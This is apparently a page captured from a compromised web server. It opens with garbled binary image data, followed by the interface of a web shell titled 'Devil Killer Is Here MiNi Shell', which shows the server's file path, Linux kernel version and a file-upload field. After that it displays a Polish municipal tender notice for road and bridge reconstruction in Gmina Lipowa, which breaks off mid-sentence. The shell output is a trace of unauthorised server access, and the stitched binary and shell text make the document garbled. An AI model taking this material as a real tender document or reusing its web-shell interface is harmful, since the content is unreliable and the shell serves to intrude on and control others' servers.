JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240711/0040730901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa i remont dróg i obiektów mostowych na terenie gminy Lipowa.<br/><br/>Zadanie dofinansowane z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Lipowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072182628</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wiejska 44</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lipowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-324</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@lipowa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lipowa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa i remont dróg i obiektów mostowych na terenie gminy Lipowa.<br/><br/>Zadanie dofinansowane z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0fbe298d-7721-4c14-9b54-e56dd3d12b1b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00407309</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00020588/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa i remont dróg i obiektów mostowych na terenie gminy Lipowa</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0fbe298d-7721-4c14-9b54-e56dd3d12b1b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r. poz. 344), za pośrednictwem platformy: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny do postępowań o udzielenia zamówienia zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady 2016 / 679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE zw. dalej RODO.<br/>1. Administratorem Pani/Pana danych osobowych jest Gmina Lipowa z siedzibą przy ul. Wiejskiej 44, 34-424 Lipowa;<br/>2. Kontakt do Inspektora Danych Osobowych: inspektor@lipowa.pl.<br/>3. Dane osobowe są przetwarzane w celu wyboru oferty i realizacji postępowania o udzielenie zamówienia, zawarcia umowy i jej rozliczenia na podstawie art. 6 ust. 1 lit b, c RODO<br/>4. Odbiorcami Pani/Pana danych osobowych będą podmioty upoważnione na podstawie prawa oraz podmioty przetwarzające na podstawie zawartych umów powierzenia przetwarzania danych w zakresie wsparcia organizacyjnego.<br/>5. Pani/Pana dane osobowe będą przechowywane przez okres archiwizacji wymaganej przepisami prawa:<br/>• ustawy z 11 września 2019 r. – Prawo zamówień publicznych;<br/>• ustawy z 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach;<br/>6. Posiada Pani/Pan prawo do żądania od administratora dostępu do danych osobowych, prawo do ich sprostowania, usunięcia po<br/>terminach archiwizacyjnych wyrażonych w odrębnych przepisach lub ograniczenia przetwarzania.<br/>7. Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego – Prezesa Urzędu ds. Ochrony Danych Osobowych.<br/>8. Podanie danych osobowych jest obligatoryjne w oparciu o przepisy prawa oraz w zakresie koniecznym do zawarcia umowy. W<br/>pozostałym zakresie jest dobrowolne. Konsekwencją nie podania danych jest niemożliwość zawarcia umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3<br/>rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>2. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą.<br/>3. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>4. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu oraz jego załączników.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.6.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest pn.: Przebudowa i remont dróg i obiektów mostowych na terenie gminy Lipowa.<br/>Zadanie dofinansowane z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych.<br/>W ramach zadania realizowana będzie przebudowa i remont dróg oraz dwóch obiektów mostowych na podstawie Programu Funkcjonalno-Użytkowego w formie „zaprojektuj i wybuduj” oraz przebudowa i remont dróg na podstawie zatwierdzonych dokumentacji projektowo-wykonawczych.<br/>Forma zamówienia to zaprojektowanie i wykonanie robót budowlanych w rozumieniu ustawy z dnia 7 lipca 1994 r. - Prawo budowlane, Zamawiający opisuje przedmiot zamówienia za pomocą programu funkcjonalno-użytkowego. Przedmiotem niniejszego zamówienia jest wykonanie kompletnej dokumentacji projektowej wraz z uzyskaniem w imieniu Zamawiającego wszystkich niezbędnych decyzji, pozwoleń, zgłoszeń i wykonanie zadania zgodnie z wykonaną dokumentacją.<br/>Do przedmiotu zamówienia należy uzyskanie niezbędnych decyzji, postanowień, opinii i uzgodnień oraz prowadzenie nadzoru autorskiego zakresie wykonywanej części projektowej oraz zapewnienie kierownictwa nad robotami we wszystkich branżach.<br/>2.	Lokalizacja: <br/>Przedmiotowe drogi zlokalizowane są na terenie gminy Lipowa na działkach w sołectwach: Lipowa, Sienna, Ostre, Leśna, Twardorzeczka, Słotwina.<br/>3.	Zakres obejmuje:<br/><br/>Zakres obejmuje przebudowę i remont dróg j.n.:<br/><br/>PFU nr 1<br/>LIPOWA<br/>LP.	nazwa drogi	status drogi	szacunkowa długość drogi (m)<br/>1.	UL. PODKOŚCIÓŁ PUBLICZNA 576,00 <br/>2.	UL. UCZUCIOWA	WEWNETRZNA 157,00 <br/>3.	UL.JAŁOWCA	WEWNETRZNA 136,00 <br/>4.	UL. ASTRÓW	WEWNETRZNA 457,00 <br/>SIENNA<br/>LP.	nazwa drogi	status drogi	szacunkowa długość drogi (m)<br/>5.	UL.AKACJOWA	WEWNETRZNA	174,00 <br/>6.	UL.JABŁONIOWA	WEWNETRZNA 290,00<br/>7.	UL.KLONOWA	WEWNETRZNA 237,00<br/>8.	UL.WIŚNIOWA	WEWNETRZNA 97,00<br/>OSTRE<br/>LP.	nazwa drogi	status drogi	szacunkowa długość drogi (m)<br/>9.	UL.ALOESOWA	WEWNETRZNA	40,00 <br/>10.	UL.NAGIETKOWA	WEWNETRZNA 120,00<br/>11.	UL.SZAŁWII	WEWNETRZNA 152,00<br/>12.	ZATOKA AUTOBUSOWA (ul. Szałwii z ul. Beskidzką)	WEWNETRZNA 22,60<br/>LEŚNA<br/>LP.	nazwa drogi	status drogi	szacunkowa długość drogi (m)<br/>13.	UL.AKSAMITKI	WEWNETRZNA	120,00 <br/>14.	UL.CYKORII	WEWNETRZNA	80,00 <br/>15.	UL.LILIAKOWA	WEWNETRZNA	222,00 <br/>16.	UL.LILIOWA	WEWNETRZNA	117,00 <br/>17.	UL.DALIOWA	WEWNETRZNA	66,00 <br/>18.	UL.ŻONKILOWA	WEWNETRZNA	240,00 <br/>19.	UL.BRATKOWA	WEWNETRZNA 68,00<br/>Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 7a do SWZ – program funkcjonalno- użytkowy (PFU nr 1).<br/><br/>PFU nr 2<br/>LIPOWA<br/>LP.	nazwa drogi	status drogi	szacunkowa długość drogi (m)<br/>20.	UL. BANASIE	WEWNETRZNA	485<br/>Uwaga: Ostateczne rozwiązania projektowe w zakresie odwodnienia odcinka drogi – ul. Banasie na wysokości działek o nr ewid. 1566/8 i 1566/7 wymagają uzgodnienia możliwości realizacyjnych w terenie.<br/>Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 7b do SWZ – program funkcjonalno- użytkowy (PFU nr 2).<br/><br/>PFU nr 3<br/>LIPOWA<br/>LP.	lokalizacja	numer drogi	szacunkowa długość MOSTU (m)<br/>21.	most łączący ul. Bratków z ul. Hiacyntową ( potok Kalonka)	G 000009	6,85 <br/>LEŚNA<br/>22.	MOST W CIĄGU UL. Bursztynowej i Wawrzynka	G 000023	44,50 <br/>Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 7c do SWZ – program funkcjonalno- użytkowy (PFU nr 3).<br/><br/>PFU nr 4<br/>LIPOWA<br/><br/>23.	Przebudowa drogi przy ul. Wichrowe Wzgórza w Lipowej.	PUBLICZNA 668,00 <br/><br/>Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 7d do SWZ – program funkcjonalno- użytkowy (PFU nr 4).<br/><br/>24. Projekt nr 1: REMONT UL. MALINOWEJ W LIPOWEJ<br/>Dokumentacja projektowo-techniczna, przedmiar robót oraz STWIORB stanowi załącznik nr 7 e do SWZ.<br/><br/>25. Projekt nr 2: Przebudowa nawierzchni wraz z odwodnieniem odcinka ul. Mirażowej w Lipowej nr dz. 428<br/>Dokumentacja projektowo-techniczna, przedmiar robót oraz STWIORB stanowi załącznik nr 7f do SWZ.<br/><br/>26. Projekt nr 3: REMONT UL. MROŻNEJ W LIPOWEJ<br/>Dokumentacja projektowo-techniczna, przedmiar robót oraz STWIORB stanowi załącznik nr 7g do SWZ.<br/><br/>27. Projekt nr 4: Przebudowa nawierzchni wraz z odwodnieniem drogi dojazdowej do Stacji Uzdatniania Wody w Lipowej, ul. Polna 22 (dz. nr 4266). <br/>Dokumentacja projektowo-techniczna, przedmiar robót oraz STWIORB stanowi załącznik nr 7h do SWZ.<br/><br/>28. Projekt nr 5: Przebudowa skrzyżowania ul. Jana Pawła II z ul. Podlas w miejscowości Lipowa wraz z przebudową odcinka sieci gazowej.<br/>Dokumentacja projektowo-techniczna, przedmiar robót oraz STWIORB stanowi załącznik nr 7i do SWZ.<br/><br/>29. Projekt nr 6: Przebudowa drogi przy ul. Jastrząbka / Babiego Lata w Lipowej.<br/>Dokumentacja projektowo-techniczna, przedmiar robót oraz STWIORB stanowi załącznik nr 7j do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert, które nie podlegają odrzuceniu. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami:<br/>Wartość punktowa oferty: K = K1 + K2<br/><br/>2. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada wszystkim wymaganiom przedstawionym w ustawie pzp oraz SWZ i została oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru i uzyska największą liczbę punktów (K) wynikających z podanego wzoru.<br/><br/>3. Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/>Kryterium (K1):<br/>Cena – 60% (max. 60 pkt)<br/>Kryterium (K2):<br/>Okres gwarancji i rękojmi – 40% (tj. max. 40 pkt)<br/><br/>Ad. Kryterium: „cena”<br/>Ocena będzie dokonywana wg następującego wzoru:<br/>Cn<br/>K1 = --------- x W<br/>Co<br/>K1 - wartość punktowa<br/>Cn - najniższa oferowana cena<br/>Co - cena ocenianej oferty<br/>W - waga = 60<br/>Jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o<br/>podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i<br/>usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami. <br/><br/>Ad. Kryterium: „okres gwarancji i rękojmi” K2 – ocena będzie przeprowadzona na podstawie długości terminu podanego przez Wykonawcę w ofercie.<br/>Okres gwarancji należy określić w pełnych miesiącach.<br/>Punktacja zostanie przyznana zgodnie z poniższym:<br/>•	36 miesięcy gwarancji i rękojmi będzie to 0 punktów, <br/>•	48 miesięcy będzie to 20 punktów, <br/>•	60 miesięcy będzie to 40 punktów.<br/>Jeżeli Wykonawca określi okres gwarancji krótszy niż 36 m-cy oferta zostanie odrzucona, jako niezgodna z SWZ art. 226 ust 1 pkt 5 Pzp.<br/>W przypadku gdy, Wykonawca zaoferuje okres gwarancji i rękojmi jakości dłuższy niż 60 miesięcy licząc od daty podpisania protokołu odbioru końcowego, Zamawiający do obliczenia punktacji w tym kryterium przyjmie okres gwarancji i rękojmi 60 miesięcy (5 lat). W przypadku niewypełnienia przez Wykonawcę w formularzu oferty pola określającego długość okresu gwarancji i rękojmi będzie to równoznaczne z udzieleniem gwarancji i rękojmi na okres 36 miesięcy.<br/>Ocena punktowa będzie zaokrąglona do dwóch miejsc po przecinku liczbą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wskazuje w tym zakresie warunków.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie wskazuje w tym zakresie warunków.<br/><br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający wymaga aby Wykonawca zapewnił finansowanie Inwestycji w części niepokrytej udziałem własnym Zamawiającego (który stanowi 5% wartości oferty lub środków wnioskowanych), na czas poprzedzający wypłatę/wypłaty z Promesy, z jednoczesnym zastrzeżeniem, że zapłata wynagrodzenia Wykonawcy Inwestycji w całości nastąpi po wykonaniu inwestycji w terminie nie dłuższym niż 35 dni od dnia odbioru Inwestycji przez Zamawiającego. W zawiązku z powyższym Wykonawca spełni warunek, jeżeli wykaże że: posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 5.000.000,00zł.<br/><br/>4)	zdolności technicznej lub zawodowej<br/>a) warunek dotyczący zdolności technicznej zostanie spełniony, jeżeli Wykonawca wykaże:<br/>- że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał należycie, zgodnie z przepisami prawa budowlanego roboty, których zakres obejmował budowę, przebudowę lub remont drogi/ lub dróg o nawierzchni mineralno- bitumicznej o łącznej długości 2000 mb w ramach max dwóch (2) umów lub max dwóch (2) postępowań przetargowych.<br/><br/>- że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, co najmniej jedną (1) usługę polegającą na opracowaniu dokumentacji projektowej dotyczącej budowy, rozbudowy, przebudowy, remontu drogi dla której należało uzyskać pozwolenie na budowę lub zgłoszenie.<br/><br/>- że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, co najmniej jedną (1) usługę polegającą na opracowaniu dokumentacji projektowej dotyczącej budowy, rozbudowy, przebudowy, remontu obiektu mostowego dla 